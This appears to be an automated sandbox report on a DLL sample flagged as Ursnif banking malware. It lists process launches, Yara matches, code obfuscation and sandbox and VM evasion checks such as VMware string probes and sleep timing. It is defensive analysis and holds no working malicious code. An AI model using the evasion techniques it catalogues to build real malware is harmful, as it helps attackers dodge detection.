Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: hFGZpat9Mf.dll Virustotal: Detection: 20%
Source: hFGZpat9Mf.dll ReversingLabs: Detection: 32%
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3272 -s 684
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER410A.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winDLL@6/6@4/7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00708912 GetDiskFreeSpaceA, 0_2_00708912
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007210CC GetLastError,FormatMessageA, 0_2_007210CC
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3272
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00716C2C FindResourceA, 0_2_00716C2C
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.261009852.0000000004A6B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: advapi32.pdbl source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: version.pdb` source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mpr.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: setupapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: shcore.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winspool.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: shell32.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: oleaut32.pdbv source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: version.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wsspicli.pdbj source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: powrprof.pdbr source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rundll32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sfc.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: comctl32v582.pdbg source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0076B448 push dword ptr [0076FF08h]; ret 0_2_0076BDEF
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007080C0 push ecx; mov dword ptr [esp], ecx 0_2_007080C5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0070E154 push 0070E180h; ret 0_2_0070E178
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0071611C push ecx; mov dword ptr [esp], edx 0_2_00716121
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072A1E4 push 0072A23Dh; ret 0_2_0072A235
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007061A2 push 007061D0h; ret 0_2_007061C8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007061A4 push 007061D0h; ret 0_2_007061C8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0071627C push ecx; mov dword ptr [esp], edx 0_2_00716281
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0071E254 push 0071E280h; ret 0_2_0071E278
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00716238 push ecx; mov dword ptr [esp], edx 0_2_0071623D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0070621C push 00706248h; ret 0_2_00706240
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007182BC push ecx; mov dword ptr [esp], ecx 0_2_007182C1
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00714558 push 007145A5h; ret 0_2_0071459D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072C64C push 0072C6C1h; ret 0_2_0072C6B9
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00714610 push 0071463Ch; ret 0_2_00714634
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072C6C4 push 0072C71Dh; ret 0_2_0072C715
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072A85C push 0072A89Fh; ret 0_2_0072A897
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072A8D4 push 0072A900h; ret 0_2_0072A8F8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0071C8C0 push ecx; mov dword ptr [esp], edx 0_2_0071C8C2
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072A90C push 0072A944h; ret 0_2_0072A93C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072A9A0 push 0072A9CCh; ret 0_2_0072A9C4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072AA70 push 0072AAA3h; ret 0_2_0072AA9B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072AAD0 push 0072AAFCh; ret 0_2_0072AAF4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00728AD4 push 00728B12h; ret 0_2_00728B0A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00728B54 push 00728B8Ch; ret 0_2_00728B84
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072AB20 push 0072AB63h; ret 0_2_0072AB5B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00728B1C push 00728B48h; ret 0_2_00728B40
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072ABEC push 0072AC38h; ret 0_2_0072AC30
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072AB88 push 0072ABCBh; ret 0_2_0072ABC3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072AC44 push 0072AC8Fh; ret 0_2_0072AC87
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00706CD8 push ecx; mov dword ptr [esp], eax 0_2_00706CD9
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072921C CreatePopupMenu,MITGetCursorUpdateHandle,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetDebugErrorLevel,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,DialogBoxParamW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,DialogBoxIndirectParamW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,MITUpdateInputGlobals, 0_2_0072921C

Hooking and other Techniques for Hiding and Protection
barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.481994883.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.302599061.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.302425761.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.302331542.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.302218181.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.302044791.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.301848056.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.302504649.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.301661083.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.777721996.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 988, type: MEMORYSTR
Source: Yara match File source: 3.2.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.ee0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.9e0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.1080000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.ed0184.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.9e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.2500000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.890184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.1080000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.2a094a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.8a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.2a094a0.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.777601117.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.253570198.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.253536439.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.315692460.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.776718826.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.776603802.0000000000890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.254119232.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.253543214.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.776641923.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.254127070.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.254160040.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.315717603.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00721174 IsIconic, 0_2_00721174
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E37170 IsIconic,GetWindowPlacement,GetWindowRect, 3_2_00E37170
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E5D24C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 3_2_00E5D24C
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072921C CreatePopupMenu,MITGetCursorUpdateHandle,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetDebugErrorLevel,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,DialogBoxParamW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,DialogBoxIndirectParamW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,MITUpdateInputGlobals, 0_2_0072921C
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\WerFault.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking system information)
Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
Contains functionality to detect sleep reduction / modifications
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072C54C 0_2_0072C54C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E3C54C 3_2_00E3C54C
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 1014 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 432 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 1247 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 805 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 867 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 964 Jump to behavior
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072C54C 0_2_0072C54C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E3C54C 3_2_00E3C54C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072165C GetSystemInfo, 0_2_0072165C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007053C4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 0_2_007053C4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E153C4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 3_2_00E153C4
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: Amcache.hve.7.dr Binary or memory string: VMware
Source: Amcache.hve.7.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.7.dr Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual USB Mouse
Source: loaddll32.exe, 00000000.00000002.777216026.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.750161784.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.772918664.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.438919060.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWve MAC Layer LightWeight Filter-0000
Source: Amcache.hve.7.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.7.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr Binary or memory string: VMware7,1
Source: Amcache.hve.7.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
